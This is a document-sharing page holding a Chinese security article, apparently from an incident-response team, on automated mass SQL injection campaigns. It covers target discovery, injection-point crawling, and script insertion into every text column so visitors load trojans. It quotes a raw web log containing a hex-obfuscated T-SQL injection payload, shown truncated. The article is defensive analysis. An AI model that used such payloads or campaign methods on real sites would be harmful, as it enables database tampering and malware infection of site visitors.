资源描述:
《警惕网络群注风暴的逼近-owasp》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、警惕网络群注风暴的逼近杭州安恒安全小组原创Frank.Fan@dbAppSecurity.com.cn当龙卷风或者特大暴风雪来临之际,往往显得特别宁静.希望这个不会应验到国内的网站上。因为在过去的几个月内国外已经连续发生两次的网站群注风暴.总共有十几万个网站在短短几天内被无情摧残,更重要的是,所有访问这些网站的无辜网民也成了最终的受害者.各类盗号木马百花齐放.当我还在05年美国拉斯维加斯黑帽子大会讲了关于网站注入的危害和防范之后,曾经和朋友闲聊起如果有个机器人利用google和网站的漏洞进行全自动传播的超级威力,这种威力甚至超
2、过了一个区域的龙卷风,因为互联网是没有边界的!!不幸的是,这个笑话已成为了现实,虽然实现的攻击机理并不是想象的那么复杂,但是当这一切变成了现实后,还是变得那么严重和可怕.网络群注(MassInjection),可以简单翻译为巨量的SQL注入(SQLInjection).SQL注入是一种目前最流行的利用网站应用程序漏洞进行对数据库以及服务器进行攻击的手段.这种攻击可能是窃取数据,插入数据,篡改数据,删除数据或者执行任意命令以致直接控制服务器.这类攻击适用范围极为广泛,目前市面上80%以上的网站挂马是出自这类攻击.而群注则在这种单
3、个网站攻击基础上在自动化和智能性方面更进了一步.也就是说,从发现网站目标到发现漏洞点到注射木马,全自动一气呵成,效率极高.很多国外著名的安全网站也惨遭毒手,更不用说是国内的许许多多防范不严的网站了.锁定目标:目标的发现有很多途径,比如通过Google等搜索引擎就是一个批量锁定目标效率极高的方式.而且利用其丰富的搜索语言可以进行更好的分类和目标锁定.发现注点:发现注点的一个最通用办法就是利用爬虫原理爬行(Crawl)整个网站,尝试相关网站程序并且找到相关注点.注射:这个阶段是群注的核心步骤.这次群注风暴所使用的手段几乎如出一辙.
4、就是往数据库的每个表的每个字符型字段中插入一段脚本.如:,由于动态程序往往会从数据库中读取相关数据并且整合成html显示到访问者浏览器.这种办法使得所有访问者都难以幸免脚本的攻击,以致于直接被xxx.cn上的木马击中.值得一提的是,这种情况下,即使该网站上装了杀木马和病毒的程序,也是无能为力的,因为真正的木马不是在受害的网站上,而是在xxx.cn上面.在杭州安恒安全小组最近处理的几次网站被攻击的应急响应中,已经发现数起被群注手段自动攻击得逞的例子,如下例:原
5、始日志如下:2008-05-1300:28:25W3SVC62824993722.1.1.11POST/news_default.asptid=117;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760061007200630068006100720028003200
6、35003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062
7、006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D00
8、3900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F00720020
